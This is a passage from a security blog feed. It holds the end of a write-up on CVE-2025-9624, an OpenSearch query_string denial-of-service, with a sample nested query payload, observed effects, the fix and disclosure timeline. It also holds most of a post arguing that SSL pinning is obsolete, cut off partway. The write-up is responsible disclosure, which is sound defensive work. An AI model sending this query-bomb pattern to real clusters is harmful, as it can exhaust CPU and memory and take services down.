&lt;p&gt;The &lt;code&gt;query_string&lt;/code&gt; query is convenient, but it&apos;s also dangerous when
users can control it. It has to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Parse the string into a query tree.&lt;/li&gt;
&lt;li&gt;Expand field lists (multi-field queries).&lt;/li&gt;
&lt;li&gt;Build Lucene queries like &lt;code&gt;BooleanQuery&lt;/code&gt;, &lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;,
&lt;code&gt;PhraseQuery&lt;/code&gt;, and others.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;To prevent runaway queries, OpenSearch already had &lt;strong&gt;clause limits&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;indices.query.bool.max_clause_count&lt;/code&gt; caps the number of clauses
&lt;strong&gt;per &lt;code&gt;BooleanQuery&lt;/code&gt; node&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Internally, &lt;code&gt;IndexSearcher.setMaxClauseCount(...)&lt;/code&gt; enforces a limit
to avoid pathological boolean expressions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, this limit is &lt;strong&gt;local to each boolean node&lt;/strong&gt;. It does &lt;strong&gt;NOT&lt;/strong&gt;
cap:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;strong&gt;total number of nodes&lt;/strong&gt; in the query tree.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;fan-out of non-boolean containers&lt;/strong&gt;, such as
&lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;, which are commonly used to aggregate
multi-field expansions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That gap is what made CVE-2025-9624 possible.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Vulnerable Design&lt;/h2&gt;
&lt;h3&gt;Per-node limits, global problem&lt;/h3&gt;
&lt;p&gt;At a high level, the vulnerable behavior can be summarized as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;OpenSearch enforces &lt;code&gt;indices.query.bool.max_clause_count&lt;/code&gt; &lt;strong&gt;per
&lt;code&gt;BooleanQuery&lt;/code&gt;&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;&lt;code&gt;query_string&lt;/code&gt; parser&lt;/strong&gt; and related builders can create &lt;strong&gt;deep
trees&lt;/strong&gt; of booleans and disjunctions.&lt;/li&gt;
&lt;li&gt;Other containers, like &lt;strong&gt;&lt;code&gt;DisjunctionMaxQuery&lt;/code&gt;&lt;/strong&gt;, are &lt;strong&gt;not
bounded&lt;/strong&gt; by the boolean clause limit.&lt;/li&gt;
&lt;li&gt;There is &lt;strong&gt;no global cap&lt;/strong&gt; on overall query size or node count.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means an attacker can construct queries where:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;No single boolean node&lt;/strong&gt; violates &lt;code&gt;max_clause_count&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;But &lt;strong&gt;the entire tree&lt;/strong&gt; still becomes enormous, consuming CPU and
heap during:
&lt;ul&gt;
&lt;li&gt;Parsing&lt;/li&gt;
&lt;li&gt;Rewrite phases&lt;/li&gt;
&lt;li&gt;Scoring and relevance calculation&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Asymmetric DoS in practice&lt;/h3&gt;
&lt;p&gt;This is an &lt;strong&gt;asymmetric DoS&lt;/strong&gt; because:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The attacker&apos;s &lt;strong&gt;cost is tiny&lt;/strong&gt;: a single crafted &lt;code&gt;_search&lt;/code&gt; request
with a &quot;large&quot; &lt;code&gt;query_string&lt;/code&gt; value with nested boolean/disjunction operations.&lt;/li&gt;
&lt;li&gt;The defender&apos;s &lt;strong&gt;cost is huge&lt;/strong&gt;: OpenSearch spends significant CPU
and memory processing that query before failing.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Building the Query Bomb&lt;/h2&gt;
&lt;p&gt;The key observation was that I could &lt;strong&gt;grow the query tree
combinatorially&lt;/strong&gt; while keeping each boolean node &quot;small&quot;.&lt;/p&gt;
&lt;p&gt;A simplified example of the pattern looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GET _search
{
  &quot;query&quot;: {
    &quot;query_string&quot;: {
      &quot;query&quot;: &quot;winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) ...&quot;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;By repeating and nesting groups, using multi-field expansions, and
keeping the boolean limits intact, the resulting Lucene structure
becomes massive.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Reproducing the Issue&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://framerusercontent.com/images/ZvYdvVnTurfoL0QqzsG5uwvGDk.png?width=3372&amp;amp;height=1886&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://framerusercontent.com/images/vdkSofwRAT9EL6669pvmm4F2fw.png?width=3326&amp;amp;height=1584&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Effects observed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;CPU spikes&lt;/li&gt;
&lt;li&gt;Heavy GC pressure&lt;/li&gt;
&lt;li&gt;Sometimes termination (&lt;code&gt;137&lt;/code&gt;/OOMKilled)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Demo (video)&lt;/h3&gt;
&lt;p&gt;&amp;lt;iframe src=&quot;https://www.youtube.com/embed/Z06POBsayqM&quot; title=&quot;OpenSearch query_string DoS (CVE-2025-9624) demo&quot; width=&quot;100%&quot; height=&quot;360&quot; allowfullscreen loading=&quot;lazy&quot;&amp;gt;&amp;lt;/iframe&amp;gt;
Direct link: https://youtu.be/Z06POBsayqM&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact Assessment&lt;/h2&gt;
&lt;p&gt;CVSS v4.0 score: &lt;strong&gt;8.3 (High)&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H
&lt;/code&gt;&lt;/pre&gt;
&lt;hr /&gt;
&lt;h2&gt;Root Cause&lt;/h2&gt;
&lt;p&gt;The issue stems from &lt;strong&gt;local limits without global bounds&lt;/strong&gt;. Boolean
node limits do not restrict the total query tree size. Multi-field
expansions and disjunctions multiply complexity until the engine
collapses under CPU/memory pressure.&lt;/p&gt;
&lt;p&gt;This matches &lt;strong&gt;CWE-674: Uncontrolled Recursion&lt;/strong&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Fix: &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;OpenSearch PR #19491 added:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;search.query.max_query_string_length
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;Default: &lt;strong&gt;32,000&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Enforced early in &lt;code&gt;QueryStringQueryParser.parse(...)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Rejects overly long &lt;code&gt;query_string&lt;/code&gt; values before parsing and
expansion&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Included starting in &lt;strong&gt;OpenSearch 3.3&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I want to publicly thanks the Amazon&apos;s OpenSearch team for such a professional triaging and transparency for this vulnerability report.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Defensive Recommendations&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Upgrade to 3.3.0+&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Set a stricter &lt;code&gt;search.query.max_query_string_length&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Avoid exposing raw &lt;code&gt;query_string&lt;/code&gt; to untrusted clients&lt;/li&gt;
&lt;li&gt;Apply rate limiting and monitor heavy queries&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;Disclosure Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;2025-09-04&lt;/strong&gt; -- Issue reported&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-09-17&lt;/strong&gt; -- Confirmed by OpenSearch team&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-10-01&lt;/strong&gt; -- Fix merged&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-10-14&lt;/strong&gt; -- OpenSearch 3.3 released&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2025-11-25&lt;/strong&gt; -- Public disclosure (Fluid Attacks + CVE
publication)&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;https://fluidattacks.com/advisories/chick&lt;/li&gt;
&lt;li&gt;https://www.cve.org/CVERecord?id=CVE-2025-9624&lt;/li&gt;
&lt;li&gt;https://nvd.nist.gov/vuln/detail/CVE-2025-9624&lt;/li&gt;
&lt;li&gt;https://github.com/opensearch-project/OpenSearch/pull/19491&lt;/li&gt;
&lt;li&gt;https://opensearch.org/blog/explore-opensearch-3-3/&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>The Obsolescence of SSL Pinning in Mobile App Security</title><link>http://caverav.cl/posts/ssl-pinning/ssl-pinning/</link><guid isPermaLink="true">http://caverav.cl/posts/ssl-pinning/ssl-pinning/</guid><pubDate>Mon, 01 Sep 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;TL;DR&lt;/h1&gt;
&lt;p&gt;This blog post is &lt;strong&gt;dense and time-consuming&lt;/strong&gt; to read in full.&lt;br /&gt;
If you just need the essentials:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SSL Pinning is obsolete&lt;/strong&gt; : Google, Apple, OWASP, and Cloudflare all discourage its use except in rare cases.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Why?&lt;/strong&gt; It&apos;s fragile (breaks when certificates rotate), high-maintenance, gives a false sense of security (easily bypassed with tools like Frida), and can cause outages or compatibility failures (especially in enterprise networks).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Better alternatives in 2025:&lt;/strong&gt; rely on the default PKI trust stores, enable Certificate Transparency, enforce HSTS, use strong TLS configs, leverage DNS CAA, and monitor your certificates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bottom line:&lt;/strong&gt; Don&apos;t pin unless you have a niche regulatory or extreme threat model that requires it, and if you do, plan very carefully for rotation.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;SSL pinning (also known as certificate pinning) is a technique that gained popularity in mobile app
security as a way to harden HTTPS connections against man-in-the-middle (MITM) attacks. The basic
idea is simple: instead of trusting all certificate authorities (CAs) in the device&apos;s trust store, the app only
trusts a specific certificate or public key that it &quot;pins&quot; as valid. In theory, this ensures the app connects
only to a server presenting the expected certificate, even if a rogue or compromised CA were to issue a
fraudulent certificate for the server&apos;s domain. For years, Android and iOS developers
implemented SSL pinning in banking, finance, and other security-sensitive apps to guarantee they were
talking to the genuine backend server and not an impostor.&lt;/p&gt;
&lt;p&gt;However, the mobile security landscape has evolved. Major platform maintainers and industry experts
now discourage the use of SSL pinning except in very special cases. What was once considered a best
practice is increasingly seen as an outdated mechanism that can create more problems than it solves. In
this post, we&apos;ll explore what SSL pinning is, why it was historically used, and the technical reasons it&apos;s
now viewed as obsolete. We&apos;ll also cite official guidance from Google and Apple advising against
pinning, discuss real-world issues pinning causes for developers and testers, and outline modern best
practices to secure HTTPS in mobile apps today (from certificate transparency to HSTS and beyond).&lt;/p&gt;
&lt;h2&gt;What Is SSL Pinning in Mobile Apps?&lt;/h2&gt;
&lt;p&gt;SSL pinning refers to configuring an application to accept only a predefined TLS certificate or public
key when establishing secure connections. In a typical TLS handshake, the client (app) trusts any server
certificate signed by a trusted CA (Certificate Authority) in the system&apos;s trust store. With pinning, the
developer narrows this trust: the app stores or &quot;pins&quot; a specific server certificate (or its public key or the
issuing CA&apos;s key) and will reject all others, even if they are otherwise valid.&lt;/p&gt;
&lt;p&gt;In practice, mobile developers have implemented pinning in a few ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;In Android:&lt;/strong&gt;&lt;br /&gt;
Historically via custom &lt;code&gt;TrustManager&lt;/code&gt; implementations that check the server&apos;s
certificate against a known good certificate or public key. Modern Android apps can use &lt;a href=&quot;https://developer.android.com/privacy-and-security/security-config#:~:text=%2A%20Cleartext%20traffic%20opt,secure%20connection%20to%20particular%20certificates&quot;&gt;Network
Security Configuration&lt;/a&gt; (an XML config) to enforce pinning for specific domains without writing
code. For example, developers might include the SHA-256 hashes of the allowed certificates
in the config. Libraries like OkHttp also provided a &lt;code&gt;CertificatePinner&lt;/code&gt; utility for pinning in
code. These approaches ensure the app only trusts the specified certs.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;In iOS:&lt;/strong&gt;&lt;br /&gt;
Commonly by implementing the &lt;code&gt;URLSessionDelegate&lt;/code&gt; method
&lt;code&gt;didReceive(authenticationChallenge:)&lt;/code&gt; to intercept the server certificate and verify it
matches a bundled certificate or key. More recently, iOS 14+ introduced a declarative pinning
capability via the app&apos;s &lt;code&gt;Info.plist&lt;/code&gt; (App Transport Security settings). Developers can list domains
under &lt;code&gt;NSAppTransportSecurity &amp;gt; NSPinnedDomains&lt;/code&gt; with one or more
&lt;code&gt;NSPinnedCAIdentities&lt;/code&gt; or public key hashes to pin the server&apos;s identity. This &quot;identity
pinning&quot; is native support for SSL pinning on Apple platforms.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By using these techniques, an app tightens the TLS verification beyond the default. If an attacker or
malicious network presents any certificate that isn&apos;t the one the app expects (even if it&apos;s otherwise valid
or signed by a public CA), the connection is aborted. This was seen as an extra layer of defense on top of
the standard HTTPS validation.&lt;/p&gt;
&lt;h2&gt;Original Benefits and Motivations for SSL Pinning&lt;/h2&gt;
&lt;p&gt;When SSL pinning was first adopted, it addressed real concerns about the trustworthiness of CAs and
the potential for MITM attacks via rogue certificates. Some key motivations and perceived benefits
were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Protection Against Malicious CAs or Misissued Certificates:&lt;/strong&gt;&lt;br /&gt;
In the past, there were incidents where CAs were breached or tricked into issuing certificates to impostors (for example, the DigiNotar and Comodo breaches in 2011 led to fraudulent certificates for major domains). Pinning gave developers peace of mind that even if a malicious or compromised CA issued a cert for their API domain, the app would reject it because it wasn&apos;t the exact cert/key that was pinned. This narrowed the trust scope to only the known server identity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Mitigating User-Installed or Device CAs:&lt;/strong&gt;&lt;br /&gt;
Mobile devices can have user-added root certificates (especially Android devices pre-Android 7 trusted user-added CAs by default). Attackers or malware could potentially install a fake root CA on a device to intercept traffic. With pinning, the app ignores any such new CAs, it only trusts the pinned cert, preventing MITM via local malicious roots. Similarly, corporate or public Wi-Fi networks that hijack traffic with their own trusted proxy cert would be blocked by pinning (only the real server cert passes).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Ensuring Exactly the Right Server:&lt;/strong&gt;&lt;br /&gt;
Pinning was appealing for high-security apps (banking, payments, healthcare) as a form of &quot;lockdown&quot;, you know exactly which server or CA your app should talk to. By hardcoding that trust, developers aimed to reduce the attack surface. It&apos;s a bit of a belt-and-suspenders approach: even if the default PKI ecosystem were to falter, the pinned cert or key remains as an uncompromised source of truth.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Preventing Silent Fail-open Scenarios:&lt;/strong&gt;&lt;br /&gt;
In a normal TLS scenario, if a certificate is untrusted, the connection fails, but some developers feared advanced attackers could somehow exploit users into bypassing warnings. In mobile apps, there typically is no interactive warning (the app either connects or it doesn&apos;t), so pinning was seen as a way to guarantee no unexpected certs are accepted under the hood. The app&apos;s logic would simply refuse anything except the known good certificate, with no option to proceed otherwise.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These benefits made SSL pinning a widely recommended practice for a time. Security guides often
listed certificate pinning as an important control to prevent advanced MITM attacks. Many developers
implemented it hoping to gain an extra layer of security for sensitive data in transit, on top of TLS.&lt;br /&gt;
In summary, the original promise of pinning was &lt;strong&gt;improved security trust&lt;/strong&gt;, ensuring that a mobile app is
truly talking to its intended server and not an impostor, even in scenarios where the global CA system
might be undermined.&lt;/p&gt;
&lt;h2&gt;Why SSL Pinning Is No Longer Recommended&lt;/h2&gt;
&lt;p&gt;In recent years, consensus has shifted: the downsides of SSL pinning now clearly outweigh its benefits
in most cases. Both Google and Apple (stewards of Android and iOS) advise against using certificate
pinning for typical apps, and the broader security community considers pinning a fragile solution. Here
are the key reasons why SSL pinning is considered obsolete or inadvisable today:&lt;/p&gt;
&lt;h3&gt;Fragility and Risk of Outages&lt;/h3&gt;
&lt;p&gt;Pinning makes your app&apos;s connectivity tightly bound to a specific certificate or key, which will
inevitably change over time. Certificates expire (often yearly, as industry rules now cap their validity),
CAs may rotate or be replaced, or you might switch to a different certificate provider. When that
happens, a pinned app will break, it will refuse to connect to the server because the &quot;expected&quot; certificate changed.&lt;/p&gt;
&lt;p&gt;The only fix is to release an app update with the new pin, and all users must upgrade before connectivity is restored. This creates a serious risk of downtime.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;If the pinned certificate changes due to renewal, revocation, or CA migration, the application will stop working until a new version of the app with an updated certificate is released,&quot;&lt;br /&gt;
as one 2025 analysis noted, meaning apps can suddenly break and critical services become unavailable until a fix is deployed and adopted.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Google&apos;s official Android guidance explicitly cautions that certificate pinning is not recommended because &quot;future server configuration changes, such as changing to another CA, will render apps with pinned certificates unable to connect to the server without a client software update.&quot;&lt;/p&gt;
&lt;p&gt;In other words, pinning couples your app to your current certificate infrastructure so tightly that any routine change becomes a potentially breaking change.&lt;/p&gt;
&lt;h3&gt;High Maintenance Overhead&lt;/h3&gt;
&lt;p&gt;Because of the fragility above, using pinning responsibly requires meticulous planning and maintenance. Developers need to anticipate certificate rotations and have processes in place to update pins proactively.&lt;/p&gt;
&lt;p&gt;Best practices for pinning call for including multiple backup pins (e.g. pinning to a set of public keys) and short pin lifetimes, in an attempt to mitigate the risk of lockout.&lt;/p&gt;
&lt;p&gt;Apple&apos;s documentation warns that if you do pin, you must &lt;em&gt;&quot;think long term&quot;&lt;/em&gt; and plan for both planned and unplanned certificate changes, including shipping app updates on short notice if something changes. Many teams simply do not have the operational rigor to manage this without error.&lt;/p&gt;
&lt;p&gt;Real-world incidents show that organizations often forget about pins they set. For example, Cloudflare observed a &lt;a href=&quot;https://blog.cloudflare.com/why-certificate-pinning-is-outdated/&quot;&gt;surge in customer outages in 2024&lt;/a&gt; after routine certificate authority changes,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;almost all customers that were impacted by the change were unaware that they had a certificate pin in place.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img src=&quot;https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1U4AFw29oL1GCcen93rnYr/5dea495d82170011725de472cfd7f98a/image4-4.png&quot; alt=&quot;Customer Outages&quot; /&gt;&lt;/p&gt;
&lt;p&gt;These teams had adopted a &quot;set and forget&quot; mentality, only to have their apps suddenly unable to connect when the backend&apos;s certificate chain changed.&lt;/p&gt;
&lt;p&gt;In today&apos;s agile DevOps environment of frequent certificate renewals, pinning turns certificate management into a landmine; if you&apos;re not extremely careful, a normal cert update could brick your app&apos;s network functionality.&lt;/p&gt;
&lt;h3&gt;Limited Security Benefits (and False Sense of Security)&lt;/h3&gt;
&lt;p&gt;Ironically, the security gains from pinning are not as strong as they once appeared. Pinning is a client-side control that can be bypassed by determined attackers who have control over the runtime environment.&lt;/p&gt;
&lt;p&gt;Security testers and malicious actors routinely use tools like &lt;a href=&quot;https://frida.re/&quot;&gt;Frida&lt;/a&gt; (a dynamic instrumentation toolkit) or custom frameworks to hook or modify app behavior and disable SSL pinning checks at runtime.&lt;/p&gt;
&lt;p&gt;In other words, an attacker who is sophisticated enough to perform an active MITM on your app is likely capable of also defeating pinning (by rooting/jailbreaking the device or using instrumentation). This means pinning often only stops casual or passive attackers, but not a dedicated adversary, giving developers an illusion of security.&lt;/p&gt;
&lt;p&gt;As one &lt;a href=&quot;https://8ksec.io/why-you-should-remove-ssl-pinning-from-your-mobile-apps-in-2025/&quot;&gt;industry blog&lt;/a&gt; put it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;SSL pinning is often recommended as a best practice, but in reality, it is an illusion of security ... it can easily be bypassed by attackers, making it more of an inconvenience for developers than a robust security measure.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also, consider the scenario of a compromised server key: if the very certificate or key you pinned is stolen by an attacker, pinning won&apos;t help, the attacker can then impersonate the server with the valid certificate, and the app will happily trust it.&lt;/p&gt;
&lt;p&gt;Pinning doesn&apos;t account for key compromise (whereas the broader PKI ecosystem at least attempts revocation, etc.). In summary, pinning is not a silver bullet, it stops some attacks, but is far from foolproof.&lt;/p&gt;
&lt;h3&gt;No Protection Against CA Ecosystem Improvements&lt;/h3&gt;
&lt;p&gt;The original motivation of pinning, fear of rogue CAs, has been largely mitigated by improvements in the industry (more on this later). Browsers and operating systems have become much more aggressive at policing CAs and reacting to mis-issuance. Major tech companies maintain tight control of root trust stores and have shown willingness to rapidly distrust CAs that go astray.&lt;/p&gt;
&lt;p&gt;Initiatives like &lt;a href=&quot;https://en.wikipedia.org/wiki/Certificate_Transparency&quot;&gt;Certificate Transparency (CT)&lt;/a&gt; now provide visibility into every certificate issued, making it hard for a bad cert to go unnoticed. In essence, the public PKI infrastructure is more secure and agile than it was a decade ago, with shortened certificate lifetimes and automated issuance.&lt;/p&gt;
&lt;p&gt;The cost-benefit equation has changed: the risk of a rogue certificate (which pinning would protect against) is now quite low, whereas the risk of your own app breaking due to pinning is comparatively higher.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning#:~:text=Considering%20the%20current%20risks%20in,security%20as%20a%20competitive%20advantage.&quot;&gt;OWASP Foundation&apos;s guidance as of 2025&lt;/a&gt; concludes that:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Considering the current risks in the CA and browser space and comparing them to the risk of down time, pinning is not recommended.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In short, the security community believes the web PKI + modern enhancements can be trusted enough in most cases, such that pinning&apos;s marginal benefit isn&apos;t worth its very real costs.&lt;/p&gt;
&lt;h3&gt;Misuse and Implementation Pitfalls&lt;/h3&gt;
&lt;p&gt;Pinning is tricky to implement correctly. Many developers in the past have made mistakes like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pinning the &lt;strong&gt;leaf certificate only&lt;/strong&gt; (which changes at every renewal),&lt;/li&gt;
&lt;li&gt;pinning only one of several backend hosts,&lt;/li&gt;
&lt;li&gt;not providing a graceful fallback.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A notorious example in web security was &lt;a href=&quot;https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning&quot;&gt;HTTP Public Key Pinning (HPKP)&lt;/a&gt;, a now-deprecated mechanism where servers told browsers to pin keys, many sites ended up bricking themselves by pinning incorrectly (so much so that browsers removed HPKP support entirely by 2019).&lt;/p&gt;
&lt;p&gt;In mobile apps, a common mistake is failing to include a backup key. Both Android and iOS docs urge that if you must pin, include multiple pins (e.g., the current key and a future key under your control, or pin a CA&apos;s key).&lt;/p&gt;
&lt;p&gt;Another pitfall is developers sometimes confuse certificate validation with pinning and accidentally disable validation, thinking they&apos;ll &quot;do pinning manually.&quot; Google explicitly warns against solutions that install a do-nothing &lt;code&gt;TrustManager&lt;/code&gt; (which accepts all certs), that&apos;s worse than no pinning, as it disables security entirely.&lt;/p&gt;
&lt;p&gt;Overall, there&apos;s a lot of room for error, and an improperly implemented pin can downgrade security or cause needless failures. It&apos;s a fragile mechanism requiring careful engineering discipline that many teams lack.&lt;/p&gt;
&lt;h3&gt;Interference with Debugging, Testing, and User Environments&lt;/h3&gt;
&lt;p&gt;SSL pinning doesn&apos;t just hinder attackers, it can hinder legitimate scenarios too. Developers and QA/Security testers often need to intercept HTTPS traffic for debugging (using tools like Charles Proxy or Burp Suite), but a pinned app will simply refuse to connect through these tools because the proxy&apos;s certificate isn&apos;t the pinned one.&lt;/p&gt;
&lt;p&gt;This means teams have to build backdoors or special debug builds without pinning to allow testing, adding complexity. From a penetration testing perspective, pinning can slow down the assessment (testers must use jailbreak/root techniques to bypass it), but as noted, it&apos;s not a serious roadblock, just an inconvenience.&lt;/p&gt;
&lt;p&gt;More importantly, pinning can disrupt real-world network environments. Many enterprise networks and antivirus products legitimately intercept TLS traffic (with the device&apos;s consent) to scan for threats, using a private CA installed on the device.&lt;/p&gt;
&lt;p&gt;A corporate employee running your app behind such a proxy or a user with a network security tool might find your app doesn&apos;t work at all due to pinning. As &lt;a href=&quot;https://owasp.org/www-community/controls/Certificate_and_Public_Key_Pinning&quot;&gt;OWASP notes&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Many corporate environments use MITM based TLS inspection, which issues cloned certificates from a corporate trusted CA. While the naming information would match, the certificate’s public key would not. This could create an unintended denial of service on the application.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In other words, your app could be completely unable to function on certain networks because it rejects the proxy&apos;s certificate, even if that proxy is trusted by the operating system. This makes pinning a liability in terms of compatibility and user experience.&lt;/p&gt;
&lt;p&gt;It can also complicate operational troubleshooting: if an outage occurs (say your server switches to a new cert chain), it might not be immediately obvious to developers that the pinning is the culprit, leading to longer downtime.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Given these issues, it&apos;s no surprise that platform providers have changed their stance. Google&apos;s Android team and Apple both discourage SSL pinning for most apps.&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Android Developers Guide&lt;/strong&gt; bluntly states that pinning:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;is not recommended for Android apps&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;due to exactly the kinds of fragility and maintenance problems described.&lt;/p&gt;
&lt;p&gt;Apple&apos;s guidance is similar: an official &lt;a href=&quot;https://developer.apple.com/news/?id=g9ejcf8y&quot;&gt;Apple Developer Technical Note from 2021&lt;/a&gt; emphasizes that:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Pinning certificates is not required&quot; for security and &quot;in most cases, pinning is not necessary and should be avoided&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;with default TLS trust sufficing for the vast majority of apps.&lt;/p&gt;
&lt;p&gt;Both Google and Apple essentially ask developers: are you sure you need to do this? Only in very special circumstances (like complying with a specific regulatory requirement to trust a private CA, or an extremely high-risk threat model) might pinning be justified, and even then, it must be managed carefully with fallback plans.&lt;/p&gt;
&lt;p&gt;The overarching message is clear: &lt;strong&gt;SSL pinning has become a legacy approach and is no longer a best practice for mobile app security.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Modern Best Practices for Securing Mobile HTTPS Communications&lt;/h2&gt;
&lt;p&gt;With SSL pinning largely deprecated, what should mobile developers and security testers focus on to
ensure secure HTTPS connections? The good news is that today&apos;s platforms and infrastructure offer
many layers of protection by default. Here are current best practices for securing network
communication in mobile apps without resorting to fragile pinning:&lt;/p&gt;
&lt;h3&gt;1. Rely on the Built-in PKI and Trust Stores&lt;/h3&gt;
&lt;p&gt;Both Android and iOS maintain a system CA trust store that is continuously updated with trusted root certificates. These platforms (Google, Apple, Mozilla, Microsoft) collaboratively manage trust and will revoke or distrust bad CAs to protect users.&lt;/p&gt;
&lt;p&gt;Unless you have a specific need, trust the system to do its job. The major OS vendors have made security of the certificate ecosystem a priority and have far more resources to evaluate CAs than any individual app developer.&lt;/p&gt;
&lt;p&gt;In modern Android and iOS, apps by default trust only well-vetted public CAs (and on Android, user-added CAs are not trusted by apps targeting recent API levels, unless you opt-in). This significantly limits the risk of a rogue certificate being accepted.&lt;/p&gt;
&lt;p&gt;In essence, leveraging the default PKI means you inherit improvements like CA/Browser Forum governance, browser/OS root programs, and timely security updates. Pinning is usually unnecessary because the default trust model is robust for most use cases.&lt;/p&gt;
&lt;h3&gt;2. Enable Certificate Transparency (CT) and Monitoring&lt;/h3&gt;
&lt;p&gt;Certificate Transparency is a system of public logs that record all certificates issued by publicly trusted CAs. CT has become mandatory for CAs (browsers will distrust certificates not present in CT logs).&lt;/p&gt;
&lt;p&gt;Mobile apps can take advantage of this by requiring CT compliance and monitoring logs for their domains.&lt;/p&gt;
&lt;ul&gt;
